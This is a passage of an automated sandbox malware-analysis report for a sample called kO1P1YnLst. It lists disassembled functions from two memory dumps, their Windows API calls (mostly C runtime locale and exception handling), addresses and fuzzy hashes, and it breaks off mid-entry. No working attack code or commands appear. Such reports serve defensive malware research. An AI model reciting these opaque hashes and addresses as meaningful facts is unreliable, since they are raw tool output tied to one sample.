GetProcAddress., xrefs: 05BE09DC, 05BE09DF, 05BE09E4
., xrefs: 05BE095F
l, xrefs: 05BE0966

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: a039102cd1ad2e813912ec2b6526216dbce4311c22ade97aa91a11f380aca31d
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: A1316CB6900609DFDB10DF99C884AAEBBF5FF48324F58408AD841A7310D7B1FA45CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 004174E4 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00413D9B,?,00000004), ref: 00417537

Strings

GetLocaleInfoEx, xrefs: 004174F5, 004174FF

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: InfoLocale
String ID: GetLocaleInfoEx
API String ID: 2299586839-2904428671
Opcode ID: f6c0c4f42c22e8201f37eacc6f7f2faf8eebaad978cceb340ad758d7620601a8
Instruction ID: 87fd85214f38bea17e9e0867028b4e6f8bd84d2b32a19a69094aa8269c1633f8
Opcode Fuzzy Hash: f6c0c4f42c22e8201f37eacc6f7f2faf8eebaad978cceb340ad758d7620601a8
Instruction Fuzzy Hash: 0AF0F631740218B7DB11AF61AC01FBE3B72DF04710F90007AFC0926291CA355E60969D

Uniqueness

Uniqueness Score: -1.00%

Function 05BF2607 Relevance: 3.5, APIs: 2, Instructions: 464COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d02e8996d5f152029f01c58331a6d8e00b2b6960daaa59dcd1034f4c9e53499d
Instruction ID: 5d8d4ab58a07ee80be8f80a02a31e364f4816086e18bc511d7800bda44a5dc0e
Opcode Fuzzy Hash: d02e8996d5f152029f01c58331a6d8e00b2b6960daaa59dcd1034f4c9e53499d
Instruction Fuzzy Hash: AC020B75E002199BDF14CFA9D880AADFBF1FF88314F1582AAD919E7384D731A945CB90

Uniqueness

Uniqueness Score: -1.00%

Function 05BECA63 Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

@, xrefs: 05BECA8A
@, xrefs: 05BECAAA

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction ID: 841bf27723e207873b78a5a3e4b59e79efda1ef635bdd2d9578223820c8e8089
Opcode Fuzzy Hash: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction Fuzzy Hash: DA313A7614C1964BC715CB3DD8B46A6BF82FAC6120B2D83F9D1968F25AD366AC46C700

Uniqueness

Uniqueness Score: -1.00%

Function 0040C7FC Relevance: 2.6, Strings: 2, Instructions: 115COMMON

Download Yara Rule

Strings

@, xrefs: 0040C823
@, xrefs: 0040C843

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction ID: bacc100dc0a0088e2915408729627ff8f5d38c09acb905e5d4049eb219c2e84e
Opcode Fuzzy Hash: d663c6dfe00d25706d24cb670eadb0d8c22117c8122b91cda8e4b90f7f1af0aa
Instruction Fuzzy Hash: 9E314B67144182CBD2049728C8E45B7B781FA8532272DC3FBD091AB7CAD23E9847960C

Uniqueness

Uniqueness Score: -1.00%

Function 05BFB989 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,00000000,?,00000008,?,?,05BFB984,00000000,?,00000008,?,?,05C03766,00000000), ref: 05BFBBB6

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction ID: 9bf4048393c6fa2c8d4bedb915e850593ce2ea383f86d9bd8c9492c33b20d1d8
Opcode Fuzzy Hash: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction Fuzzy Hash: 6AB16B31214608DFD715CF28C48AB657BE1FF44364F29C698E99ACF2A1C735E986CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0041B722 Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0041B71D,?,?,00000008,?,?,004234FF,00000000), ref: 0041B94F

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction ID: 77e1d80032caf57d447ccd467e54c4f0879ce58ba2590176158d9b4cb40e0a8d
Opcode Fuzzy Hash: f1a68854a496e32e4efb1ca7e5057a0d5019f0566500f27883cfa461ebf77d9f
Instruction Fuzzy Hash: F4B13C71620608DFD715CF28C48ABA57BE0FF45364F298659E999CF3A1C339D982CB84

Uniqueness

Uniqueness Score: -1.00%

Function 05C007D5 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 05BF6F80: GetLastError.KERNEL32(?,?,05BEE697,?,?,?,05BEED94,?), ref: 05BF6F84
Part of subcall function 05BF6F80: _free.LIBCMT ref: 05BF6FB7
Part of subcall function 05BF6F80: SetLastError.KERNEL32(00000000), ref: 05BF6FF8
Part of subcall function 05BF6F80: _abort.LIBCMT ref: 05BF6FFE

Part of subcall function 05BF6F80: _free.LIBCMT ref: 05BF6FDF
Part of subcall function 05BF6F80: SetLastError.KERNEL32(00000000), ref: 05BF6FEC

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 05C00829

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
Instruction ID: a553bb3991489daa208ef94a705780a5df07560d3365e323ea77a3a237606391
Opcode Fuzzy Hash: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
Instruction Fuzzy Hash: 8A21F872614606AFDB24AF24CC49F7A33ACFF40310F5512BAED05E6180EB34E944CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0042056E Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

Part of subcall function 00416D19: _free.LIBCMT ref: 00416D78
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D85

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004205C2

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
Instruction ID: 81f412bf0acab0c669cc413bed1d2c5f28af9b0bc2236bf2d8b3c2af5f6810e7
Opcode Fuzzy Hash: 4116439ae91366f41282ed713e0c122018c407589a1ddbdbdc27593073e2c1ea
Instruction Fuzzy Hash: CD21A472A10126AFDB249F25EC41BBB73E8EB84314F50007BE905D6242EB78AD94CB59

Uniqueness

Uniqueness Score: -1.00%

Function 05C0045D Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 05BF6F80: GetLastError.KERNEL32(?,?,05BEE697,?,?,?,05BEED94,?), ref: 05BF6F84
Part of subcall function 05BF6F80: _free.LIBCMT ref: 05BF6FB7
Part of subcall function 05BF6F80: SetLastError.KERNEL32(00000000), ref: 05BF6FF8
Part of subcall function 05BF6F80: _abort.LIBCMT ref: 05BF6FFE

EnumSystemLocalesW.KERNEL32(0042031E,00000001), ref: 05C004CF

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction ID: e03a34cde5e46c4aac5d59e9bc1d957fba95835f7a935eb2d4dbb3267e5a5d19
Opcode Fuzzy Hash: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction Fuzzy Hash: 0B118C372007019FDB189F79C8A8B7AB792FF80318B55483CE98657A80D3717642CB40

Uniqueness

Uniqueness Score: -1.00%

Function 004201F6 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

EnumSystemLocalesW.KERNEL32(0042031E,00000001), ref: 00420268

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction ID: 80b9233af1491a43965ff49f25878bf7386ded64d37c123707e1c04ccab01a49
Opcode Fuzzy Hash: ff6f83cfa8bdbd55e2ef97b9601fb2e990aa0d82fc0a50898d812a3fcf459d11
Instruction Fuzzy Hash: 2E11593A3003058FDB189F79E8955BABBD1FF80358B54442EE94647B01D775AC42CB54

Uniqueness

Uniqueness Score: -1.00%

Function 05C00A05 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 05BF6F80: GetLastError.KERNEL32(?,?,05BEE697,?,?,?,05BEED94,?), ref: 05BF6F84
Part of subcall function 05BF6F80: _free.LIBCMT ref: 05BF6FB7
Part of subcall function 05BF6F80: SetLastError.KERNEL32(00000000), ref: 05BF6FF8
Part of subcall function 05BF6F80: _abort.LIBCMT ref: 05BF6FFE

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,05C007A3,00000000,00000000,?), ref: 05C00A31

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction ID: f1048d6cfc8de1b4c7cafbe858045c444539a1300ebc2f48731859f40c991215
Opcode Fuzzy Hash: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction Fuzzy Hash: 4FF0F932A15125BFDB249A64880DBBA7769FB40764F460879ED0AB31C0EA74BF41C6D0

Uniqueness

Uniqueness Score: -1.00%

Function 0042079E Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0042053C,00000000,00000000,?), ref: 004207CA

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: ErrorLast$InfoLocale_abort_free
String ID:
API String ID: 2692324296-0
Opcode ID: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction ID: 232df0c2e22441a9dd69ecf2977a2312304a26c18b6acff2860949399b437602
Opcode Fuzzy Hash: d969c988a7a4ca556ab4c21c04b1554a131da5740cd7ac311d95d19bc6f29925
Instruction Fuzzy Hash: 59F04932B00135ABDB285A25E8057BB77E8EB40314F51042BEC05A3641EB78BD41CAE4

Uniqueness

Uniqueness Score: -1.00%

Function 05C007D3 Relevance: 1.5, APIs: 1, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 05BF6F80: GetLastError.KERNEL32(?,?,05BEE697,?,?,?,05BEED94,?), ref: 05BF6F84
Part of subcall function 05BF6F80: _free.LIBCMT ref: 05BF6FB7
Part of subcall function 05BF6F80: SetLastError.KERNEL32(00000000), ref: 05BF6FF8
Part of subcall function 05BF6F80: _abort.LIBCMT ref: 05BF6FFE

Part of subcall function 05BF6F80: _free.LIBCMT ref: 05BF6FDF
Part of subcall function 05BF6F80: SetLastError.KERNEL32(00000000), ref: 05BF6FEC

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 05C00829

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$InfoLocale_abort
String ID:
API String ID: 1663032902-0
Opcode ID: f3b390e475d9413ff6b7c2f94ac24b015e0c90e9044f669a54f5ffb26abc6a4e
Instruction ID: e3002c2f30180fa3644b1832ea2f6fb96aeb441809ee8303142620670fa660af
Opcode Fuzzy Hash: f3b390e475d9413ff6b7c2f94ac24b015e0c90e9044f669a54f5ffb26abc6a4e
Instruction Fuzzy Hash: 70F02832B00209ABDB14AF34DC49FBA33ACEF44310F4502B9FA06E7280DA74AD0987D4

Uniqueness

Uniqueness Score: -1.00%

Function 05C004F8 Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 05BF6F80: GetLastError.KERNEL32(?,?,05BEE697,?,?,?,05BEED94,?), ref: 05BF6F84
Part of subcall function 05BF6F80: _free.LIBCMT ref: 05BF6FB7
Part of subcall function 05BF6F80: SetLastError.KERNEL32(00000000), ref: 05BF6FF8
Part of subcall function 05BF6F80: _abort.LIBCMT ref: 05BF6FFE

EnumSystemLocalesW.KERNEL32(0042056E,00000001), ref: 05C00544

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction ID: 7ad565daa173690792a99267fec9a548c09be09ef533798582715d57a7e0c499
Opcode Fuzzy Hash: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction Fuzzy Hash: B0F028323003049FDB249F799C98B7A7B91FF80758F45447DF94697580D671D941CA44

Uniqueness

Uniqueness Score: -1.00%

Function 00420291 Relevance: 1.5, APIs: 1, Instructions: 42COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

EnumSystemLocalesW.KERNEL32(0042056E,00000001), ref: 004202DD

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction ID: d57b86ad11fc321639f916cdd89717e5b85f45a329514cfdd24aab137e17032f
Opcode Fuzzy Hash: bd8f5970e3db34e22d1d19c1237d72c45fa718bf0307cd8600b4dfd183e08e57
Instruction Fuzzy Hash: 4CF0F4363003149FDB249E3AE88566A7BD1EB80358B55806FE9418B641D6B59C41CA14

Uniqueness

Uniqueness Score: -1.00%

Function 05BF774B Relevance: 1.5, APIs: 1, Instructions: 37COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,05BF4002,?,00000004), ref: 05BF779E

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 16cd5fe533abe38c8938b3605934ededaf6bf2fe340af36181b6536a737cd79b
Instruction ID: 48bd2fffdb0b85c139177643b7b0c477369734bc2f086338289e0cf7b07cac7d
Opcode Fuzzy Hash: 16cd5fe533abe38c8938b3605934ededaf6bf2fe340af36181b6536a737cd79b
Instruction Fuzzy Hash: E2F0CD31740218BBDB11AF60EC05F7E7B62EF04B10F9000F9FD0926260CA716A289789

Uniqueness

Uniqueness Score: -1.00%

Function 05BF7358 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 05BF1C62: RtlEnterCriticalSection.NTDLL(?), ref: 05BF1C71

EnumSystemLocalesW.KERNEL32(004170AB,00000001,00438F98,0000000C), ref: 05BF7390

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction ID: b950b63bc65564acf9ca41ff30186d669a7c28a80c621131a5a0fa8c5d48e3e3
Opcode Fuzzy Hash: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction Fuzzy Hash: 68F0EC32A50304AFDB15EF68D849B5D77F0EB04714F1052AAE514DB2A0CB7469588B89

Uniqueness

Uniqueness Score: -1.00%

Function 004170F1 Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 004119FB: EnterCriticalSection.KERNEL32(?,?,00416AB9,?,00438F18,00000008,00416B87,?,?,?), ref: 00411A0A

EnumSystemLocalesW.KERNEL32(Function_000170AB,00000001,00438F98,0000000C), ref: 00417129

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: CriticalEnterEnumLocalesSectionSystem
String ID:
API String ID: 1272433827-0
Opcode ID: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction ID: 227376a4ab674bdc9c4c41bbf3289077a45538867ed31d3f45bd6c9a80692724
Opcode Fuzzy Hash: 98d3e451abc7e989256bbd287038582e95eb7ce4d650044e533e8dd2bbf972e9
Instruction Fuzzy Hash: CEF03C72A60204AFEB14EF69D846B9D7BF0EB04724F10516AF514DB2E2CB788994CB49

Uniqueness

Uniqueness Score: -1.00%

Function 05C00412 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 05BF6F80: GetLastError.KERNEL32(?,?,05BEE697,?,?,?,05BEED94,?), ref: 05BF6F84
Part of subcall function 05BF6F80: _free.LIBCMT ref: 05BF6FB7
Part of subcall function 05BF6F80: SetLastError.KERNEL32(00000000), ref: 05BF6FF8
Part of subcall function 05BF6F80: _abort.LIBCMT ref: 05BF6FFE

EnumSystemLocalesW.KERNEL32(00420102,00000001), ref: 05C00449

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction ID: 61f97c3fd0d180d0ad9811dbdbed90cd748256646d1f82afeeca178c666609d3
Opcode Fuzzy Hash: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction Fuzzy Hash: 92F0553630020597CB08AF7ADC09B7ABF91FFC1714B8740AAEF098B281C6319942C794

Uniqueness

Uniqueness Score: -1.00%

Function 004201AB Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

Part of subcall function 00416D19: GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
Part of subcall function 00416D19: _free.LIBCMT ref: 00416D50
Part of subcall function 00416D19: SetLastError.KERNEL32(00000000), ref: 00416D91
Part of subcall function 00416D19: _abort.LIBCMT ref: 00416D97

EnumSystemLocalesW.KERNEL32(00420102,00000001), ref: 004201E2

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem_abort_free
String ID:
API String ID: 1084509184-0
Opcode ID: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction ID: 1f93f3ac1edaee4f5bdf4820daeb7c54606ccdf48e22ceddedb235dadc806722
Opcode Fuzzy Hash: 41353a6a5a1ae6525751a9f7d236a5596a36ca5e687db3fc97805353d191d65e
Instruction Fuzzy Hash: FAF05C3530021557CB089F36EC056767FD1FFC1714F46405EEE058B242C676D852C754

Uniqueness

Uniqueness Score: -1.00%

Function 05BE9E6D Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00409C12,05BE95DF), ref: 05BE9E72

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction ID: 25375c97a59092c1080366b5be14f539dc246f89f8962c586dc55e39c5aaa00f
Opcode Fuzzy Hash: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00409C06 Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00009C12,00409378), ref: 00409C0B

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction ID: 25375c97a59092c1080366b5be14f539dc246f89f8962c586dc55e39c5aaa00f
Opcode Fuzzy Hash: 446271a214095958ad9c011d01ba42074dae904a52e7de46a6d8a851fd51a1a0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 05BEF6A8 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 05BEF818

Memory Dump Source

Source File: 00000000.00000002.1986302884.0000000005BE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05BE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5be0000_kO1P1YnLst.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction ID: 22a008b753d1bce13e1e9583290e0f7eabce4739cbcf6226629c50db74bc773a
Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction Fuzzy Hash: F85137627087459BEF388D788558BBE279AFF42244F1C0ADAD843C7291D725FA85C352

Uniqueness

Uniqueness Score: -1.00%

Function 0040F441 Relevance: 1.5, Strings: 1, Instructions: 214COMMON

Download Yara Rule

Strings

0, xrefs: 0040F5B1

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kO1P1YnLst.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction ID: 94e3407a31f2bbdf6c701076615be5a87d66d0396b04c414de024b601701c707
Opcode Fuzzy Hash: b6b344bc33aa75e8b74452ce0f577aa81992de8fdf6ffb4767baca486ca3f9e2
Instruction Fuzzy Hash: F351236160464466DB388D688856BBF23959B25304F18093BEC46B7FC3D63DED0F939E

Uniqueness

Uniqueness Score: -1.00%

Function 00420AEA Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00420AEA

Memory Dump Source

Source File: 00000000.00000002.1983816671.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

